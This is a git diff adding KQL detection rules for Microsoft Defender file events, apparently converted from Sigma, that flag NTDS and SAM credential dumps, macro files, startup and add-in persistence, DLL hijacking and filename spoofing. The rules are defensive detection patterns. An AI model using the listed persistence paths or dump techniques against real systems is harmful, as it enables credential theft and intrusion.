diff --git a/KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql b/KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql
new file mode 100644
index 00000000..5bad4655
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/ntds_exfiltration_filename_patterns.kql
@@ -0,0 +1,10 @@
+// Title: NTDS Exfiltration Filename Patterns
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceFileEvents
+| where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/octopus_scanner_malware.kql b/KQL/rules/windows/file/file_event/octopus_scanner_malware.kql
new file mode 100644
index 00000000..ac84e02e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/octopus_scanner_malware.kql
@@ -0,0 +1,10 @@
+// Title: Octopus Scanner Malware
+// Author: NVISO
+// Date: 2020-06-09
+// Level: high
+// Description: Detects Octopus Scanner Malware.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1195, attack.t1195.001
+
+DeviceFileEvents
+| where FolderPath endswith "\\AppData\\Local\\Microsoft\\Cache134.dat" or FolderPath endswith "\\AppData\\Local\\Microsoft\\ExplorerSync.db"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/office_macro_file_creation.kql b/KQL/rules/windows/file/file_event/office_macro_file_creation.kql
new file mode 100644
index 00000000..baaec717
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/office_macro_file_creation.kql
@@ -0,0 +1,12 @@
+// Title: Office Macro File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: low
+// Description: Detects the creation of a new office macro files on the systems
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+//   - Very common in environments that rely heavily on macro documents
+
+DeviceFileEvents
+| where FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql b/KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql
new file mode 100644
index 00000000..9640ab1d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/office_macro_file_creation_from_suspicious_process.kql
@@ -0,0 +1,10 @@
+// Title: Office Macro File Creation From Suspicious Process
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: high
+// Description: Detects the creation of a office macro file from a a suspicious process
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessParentFileName in~ ("cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe"))) and (FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/office_macro_file_download.kql b/KQL/rules/windows/file/file_event/office_macro_file_download.kql
new file mode 100644
index 00000000..8ffca814
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/office_macro_file_download.kql
@@ -0,0 +1,14 @@
+// Title: Office Macro File Download
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-23
+// Level: low
+// Description: Detects the creation of a new office macro files on the system via an application (browser, mail client).
+// This can help identify potential malicious activity, such as the download of macro-enabled documents that could be used for exploitation.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+//   - Legitimate macro files downloaded from the internet
+//   - Legitimate macro files sent as attachments via emails
+
+DeviceFileEvents
+| where ((FolderPath endswith ".docm" or FolderPath endswith ".dotm" or FolderPath endswith ".xlsm" or FolderPath endswith ".xltm" or FolderPath endswith ".potm" or FolderPath endswith ".pptm") or (FolderPath contains ".docm:Zone" or FolderPath contains ".dotm:Zone" or FolderPath contains ".xlsm:Zone" or FolderPath contains ".xltm:Zone" or FolderPath contains ".potm:Zone" or FolderPath contains ".pptm:Zone")) and (InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\thunderbird.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql
new file mode 100644
index 00000000..a10c127d
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/onenote_attachment_file_dropped_in_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: OneNote Attachment File Dropped In Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-22
+// Level: medium
+// Description: Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Legitimate usage of ".one" or ".onepkg" files from those locations
+
+DeviceFileEvents
+| where ((FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\") and (FolderPath endswith ".one" or FolderPath endswith ".onepkg")) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\ONENOTE.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql b/KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql
new file mode 100644
index 00000000..b3dc4af7
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/pcre_net_package_temp_files.kql
@@ -0,0 +1,10 @@
+// Title: PCRE.NET Package Temp Files
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-29
+// Level: high
+// Description: Detects processes creating temp files related to PCRE.NET package
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceFileEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql b/KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql
new file mode 100644
index 00000000..310bd1a4
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/pdf_file_created_by_regedit_exe.kql
@@ -0,0 +1,13 @@
+// Title: PDF File Created By RegEdit.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-08
+// Level: high
+// Description: Detects the creation of a file with the ".pdf" extension by the "RegEdit.exe" process.
+// This indicates that a user is trying to print/save a registry key as a PDF in order to potentially extract sensitive information and bypass defenses.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\regedit.exe" and FolderPath endswith ".pdf"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql b/KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql
new file mode 100644
index 00000000..0b8e07fa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_binary_or_script_dropper_via_powershell.kql
@@ -0,0 +1,12 @@
+// Title: Potential Binary Or Script Dropper Via PowerShell
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-17
+// Level: medium
+// Description: Detects PowerShell creating a binary executable or a script file.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly.
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".com" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".jar" or FolderPath endswith ".js" or FolderPath endswith ".ocx" or FolderPath endswith ".scr" or FolderPath endswith ".sys" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf")) and (not(((FolderPath endswith "\\Microsoft.PackageManagement.NuGetProvider.dll" and FolderPath startswith "C:\\Program Files\\PackageManagement\\ProviderAssemblies\\nuget\\") or ((FolderPath endswith ".dll" or FolderPath endswith ".exe") and (FolderPath startswith "C:\\Windows\\Temp\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\")) or (FolderPath contains "\\WindowsPowerShell\\Modules\\" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Users\\") or (FolderPath contains "\\AppData\\Local\\Temp\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") and FolderPath startswith "C:\\Users\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql b/KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql
new file mode 100644
index 00000000..1d16c985
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_dcom_internetexplorer_application_dll_hijack.kql
@@ -0,0 +1,10 @@
+// Title: Potential DCOM InternetExplorer.Application DLL Hijack
+// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql
new file mode 100644
index 00000000..3b9e8ffa
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_file_extension_spoofing_using_right_to_left_override.kql
@@ -0,0 +1,12 @@
+// Title: Potential File Extension Spoofing Using Right-to-Left Override
+// Author: Jonathan Peters (Nextron Systems), Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2024-11-17
+// Level: high
+// Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1036.002
+// False Positives:
+//   - Filenames that contains scriptures such as arabic or hebrew might make use of this character
+
+DeviceFileEvents
+| where (FolderPath contains "3pm." or FolderPath contains "4pm." or FolderPath contains "cod." or FolderPath contains "fdp." or FolderPath contains "ftr." or FolderPath contains "gepj." or FolderPath contains "gnp." or FolderPath contains "gpj." or FolderPath contains "ism." or FolderPath contains "lmth." or FolderPath contains "nls." or FolderPath contains "piz." or FolderPath contains "slx." or FolderPath contains "tdo." or FolderPath contains "vsc." or FolderPath contains "vwm." or FolderPath contains "xcod." or FolderPath contains "xslx." or FolderPath contains "xtpp.") and (FolderPath contains "\\u202e" or FolderPath contains "[U+202E]")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
new file mode 100644
index 00000000..088e87ae
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql
@@ -0,0 +1,12 @@
+// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream
+// Author: Scoubi (@ScoubiMtl)
+// Date: 2023-10-09
+// Level: medium
+// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+//   - Unlikely
+
+DeviceFileEvents
+| where FolderPath contains "::$index_allocation"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
new file mode 100644
index 00000000..eda4034a
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql
@@ -0,0 +1,14 @@
+// Title: Potential Homoglyph Attack Using Lookalike Characters in Filename
+// Author: Micah Babinski, @micahbabinski
+// Date: 2023-05-08
+// Level: medium
+// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
+// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
+// False Positives:
+//   - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use.
+
+DeviceFileEvents
+| where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql b/KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql
new file mode 100644
index 00000000..1337b527
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_initial_access_via_dll_search_order_hijacking.kql
@@ -0,0 +1,10 @@
+// Title: Potential Initial Access via DLL Search Order Hijacking
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1566, attack.t1566.001, attack.initial-access, attack.t1574, attack.t1574.001, attack.defense-evasion
+
+DeviceFileEvents
+| where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql
new file mode 100644
index 00000000..665e7534
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_attempt_via_errorhandler_cmd.kql
@@ -0,0 +1,11 @@
+// Title: Potential Persistence Attempt Via ErrorHandler.Cmd
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-09
+// Level: medium
+// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
+// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceFileEvents
+| where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql
new file mode 100644
index 00000000..2730248f
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_add_in.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Microsoft Office Add-In
+// Author: NVISO
+// Date: 2020-05-11
+// Level: high
+// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.006
+// False Positives:
+//   - Legitimate add-ins
+
+DeviceFileEvents
+| where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql
new file mode 100644
index 00000000..ec09b020
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_via_microsoft_office_startup_folder.kql
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Microsoft Office Startup Folder
+// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+//   - Loading a user environment from a backup or a domain controller
+//   - Synchronization of templates
+
+DeviceFileEvents
+| where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql
new file mode 100644
index 00000000..7350a916
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_via_notepad_plugins.kql
@@ -0,0 +1,13 @@
+// Title: Potential Persistence Via Notepad++ Plugins
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: medium
+// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+//   - Possible FPs during first installation of Notepad++
+//   - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities
+
+DeviceFileEvents
+| where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\npp." and InitiatingProcessFolderPath endswith ".exe" and (FolderPath in~ ("C:\\Program Files\\Notepad++\\plugins\\NppExport\\NppExport.dll", "C:\\Program Files\\Notepad++\\plugins\\mimeTools\\mimeTools.dll", "C:\\Program Files\\Notepad++\\plugins\\NppConverter\\NppConverter.dll", "C:\\Program Files\\Notepad++\\plugins\\Config\\nppPluginList.dll"))))))
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql b/KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql
new file mode 100644
index 00000000..47dd212e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_persistence_via_outlook_form.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Outlook Form
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2021-06-10
+// Level: high
+// Description: Detects the creation of a new Outlook form which can contain malicious code
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.003
+// False Positives:
+//   - Legitimate use of outlook forms
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql b/KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql
new file mode 100644
index 00000000..2cf3d628
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_privilege_escalation_attempt_via_exe_local_technique.kql
@@ -0,0 +1,10 @@
+// Title: Potential Privilege Escalation Attempt Via .Exe.Local Technique
+// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)
+// Date: 2022-12-16
+// Level: high
+// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation
+
+DeviceFileEvents
+| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql
new file mode 100644
index 00000000..925e5d2e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_ripzip_attack_on_startup_folder.kql
@@ -0,0 +1,12 @@
+// Title: Potential RipZip Attack on Startup Folder
+// Author: Greg (rule)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut.
+// If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.
+// Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547
+
+DeviceFileEvents
+| where InitiatingProcessFolderPath endswith "\\explorer.exe" and (FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" and FolderPath contains ".lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_sam_database_dump.kql b/KQL/rules/windows/file/file_event/potential_sam_database_dump.kql
new file mode 100644
index 00000000..33c6c458
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_sam_database_dump.kql
@@ -0,0 +1,12 @@
+// Title: Potential SAM Database Dump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-11
+// Level: high
+// Description: Detects the creation of files that look like exports of the local SAM (Security Account Manager)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+//   - Rare cases of administrative activity
+
+DeviceFileEvents
+| where (FolderPath endswith "\\Temp\\sam" or FolderPath endswith "\\sam.sav" or FolderPath endswith "\\Intel\\sam" or FolderPath endswith "\\sam.hive" or FolderPath endswith "\\Perflogs\\sam" or FolderPath endswith "\\ProgramData\\sam" or FolderPath endswith "\\Users\\Public\\sam" or FolderPath endswith "\\AppData\\Local\\sam" or FolderPath endswith "\\AppData\\Roaming\\sam" or FolderPath endswith "_ShadowSteal.zip" or FolderPath endswith "\\Documents\\SAM.export" or FolderPath endswith ":\\sam") or (FolderPath contains "\\hive_sam_" or FolderPath contains "\\sam.save" or FolderPath contains "\\sam.export" or FolderPath contains "\\~reg_sam.save" or FolderPath contains "\\sam_backup" or FolderPath contains "\\sam.bck" or FolderPath contains "\\sam.backup")
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql
new file mode 100644
index 00000000..d38c938e
--- /dev/null
+++ b/KQL/rules/windows/file/file_event/potential_startup_shortcut_persistence_via_powershell_exe.kql
@@ -0,0 +1,15 @@
+// Title: Potential Startup Shortcut Persistence Via PowerShell.EXE
+// Author: Christopher Peacock '@securepeacock', SCYTHE
+// Date: 2021-10-24
+// Level: high
+// Description: Detects PowerShell writing startup shortcuts.
+// This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.
+// Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.
+// In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware.
+
+DeviceFileEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath contains "\\start menu\\programs\\startup\\" and FolderPath endswith ".lnk"
\ No newline at end of file
diff --git a/KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql b/KQL/rules/windows/file/file_event/potential_suspicious_powershell_module_file_created.kql
new file mode 100644
index 00000000..46850117
--- /dev/null
